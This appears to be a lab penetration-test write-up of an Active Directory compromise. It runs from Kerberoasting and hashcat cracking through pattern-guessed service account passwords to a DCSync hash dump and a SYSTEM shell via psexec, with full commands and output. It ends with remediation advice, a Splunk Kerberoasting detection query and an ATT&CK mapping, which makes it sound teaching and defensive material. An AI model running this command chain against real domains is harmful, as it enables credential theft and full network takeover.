Complete Active Directory attack chain from an assumed-breach low-privilege domain user to full domain compromise — Kerberoasting, offline credential cracking, privilege escalation via over-privileged service account, and DCSync to extract all domain hashes.
| Field | Detail |
|---|---|
| Target | Internal Active Directory Network — domain: ad.lab |
| Scope | Complete domain compromise |
| Objective | Domain Admin access from low-privilege domain user |
| Attack Vector | Kerberoasting + credential cracking + privilege escalation |
| Difficulty | Medium–High |
| Starting Position | Assumed breach — credentials: john.smith:Welcome1! |
| Tools | BloodHound, Impacket, Hashcat, CrackMapExec, secretsdump.py, psexec.py |
Starting with low-privilege credentials from an assumed breach, BloodHound enumeration identified two Kerberoastable service accounts — svc_sql and svc_backup. Critically, svc_backup was a member of the Domain Admins group. The svc_sql TGS hash was extracted and cracked in 3 minutes 15 seconds. Password pattern analysis revealed the likely password for svc_backup, which was validated as a Domain Admin. A DCSync attack then extracted all domain hashes, including the krbtgt hash, achieving full domain compromise.
Starting from the assumed breach position with john.smith:Welcome1!, BloodHound was used for AD enumeration.
# Validate credentials and confirm domain connectivity
crackmapexec smb 10.80.80.2 -u john.smith -p Welcome1!
SMB 10.80.80.2 445 DC01 [+] AD.LAB\john.smith:Welcome1!
# Collect BloodHound data
bloodhound-python -d ad.lab -u john.smith -p Welcome1! -c All -ns 10.80.80.2BloodHound analysis revealed two critical findings:
Kerberoasting requests service tickets (TGS) for accounts with registered SPNs. The KDC encrypts the ticket with the service account's NTLM password hash — which is returned to the requesting client and can be extracted offline. No special privileges are required beyond a valid domain account.
GetUserSPNs.py ad.lab/john.smith:Welcome1! -dc-ip 10.80.80.2 -request -outputfile kerberoast.hashes
ServicePrincipalName Name MemberOf
---------------------------- --------- -----------------------------------------
MSSQLSvc/dc01.ad.lab:1433 svc_sql
BackupSvc/dc01.ad.lab svc_backup CN=Domain Admins,CN=Users,DC=ad,DC=lab
[*] Total of 2 entries returned.
[*] Hash written to kerberoast.hashesBoth hashes extracted in Hashcat mode 13100 format ($krb5tgs$23$).
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --force
$krb5tgs$23$*svc_sql*:[hash]:SQLService1
Session..........: hashcat
Status...........: Cracked
Time.Estimated...: 0 secs (3 min, 15 secs elapsed)Credentials for svc_sql obtained: svc_sql:SQLService1. The svc_backup hash was not cracked via wordlist — but password pattern analysis identified a critical pattern.
# Validate svc_sql credentials
crackmapexec smb 10.80.80.2 -u svc_sql -p SQLService1
[+] AD.LAB\svc_sql:SQLService1
# Password pattern analysis: ServiceName + Number + Special
# svc_sql → SQLService1
# svc_backup → BackupPass1! (pattern: ServiceKeyword + Pass + Number + Special)
crackmapexec smb 10.80.80.2 -u svc_backup -p BackupPass1!
[+] AD.LAB\svc_backup:BackupPass1! (Pwn3d!)svc_backup credentials validated as Domain Admin. The (Pwn3d!) indicator confirms admin-level SMB access.
With Domain Admin credentials, a DCSync attack was performed. DCSync abuses Active Directory replication — simulating a domain controller requesting credential replication from DC01 to extract all domain account hashes, including the krbtgt hash used for Golden Ticket attacks.
secretsdump.py ad.lab/svc_backup:BackupPass1!@10.80.80.2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[krbtgt_hash]:::
john.smith:1103:aad3b435b51404eeaad3b435b51404ee:[hash]:::
svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:[hash]:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:[hash]:::
# ...all domain accounts extracted
# Remote code execution as SYSTEM
psexec.py ad.lab/svc_backup:BackupPass1!@10.80.80.2
C:\Windows\system32> whoami
nt authority\system| # | Finding | Severity | Recommendation |
|---|---|---|---|
| 1 | svc_backup in Domain Admins — Kerberoastable service account with Domain Admin | Critical | Remove Domain Admin membership from service accounts; apply least-privilege principle |
| 2 | Weak service account passwords cracked in under 5 minutes | Critical | 25+ character random passwords for service accounts; implement gMSA (Group Managed Service Accounts) |
| 3 | Predictable password pattern across service accounts | High | Use randomly generated passwords with no organizational pattern; no shared naming conventions |
| 4 | Kerberoastable service accounts with weak passwords | High | 25+ character passwords for any account with SPNs; use gMSA where possible to eliminate manual password management |
| 5 | No Kerberoasting detection or alerting | Medium | Alert on Event ID 4769 with RC4 encryption type from non-service hosts; baseline normal TGS request volume |
| 6 | No credential hygiene — service accounts used for multiple services | High | Unique service account per application; no shared service credentials across services |
# Event ID 4769 — Kerberos Service Ticket Requested
# Alert on RC4 encryption (etype 0x17) — indicates Kerberoasting tool
# (modern clients use AES; RC4 requests are anomalous)
index=security EventCode=4769
TicketEncryptionType=0x17
NOT ServiceName="*$" -- exclude computer accounts
| stats count by TargetUserName, IpAddress
| where count > 3
| sort -count| Technique ID | Technique |
|---|---|
| T1482 | Domain Trust Discovery — BloodHound domain enumeration |
| T1558.003 | Kerberoasting — TGS hash extraction from SPN accounts |
| T1110.002 | Password Cracking — offline hash cracking with Hashcat |
| T1078.002 | Valid Domain Accounts — service account credential abuse |
| T1003.006 | DCSync — domain credential dumping via replication abuse |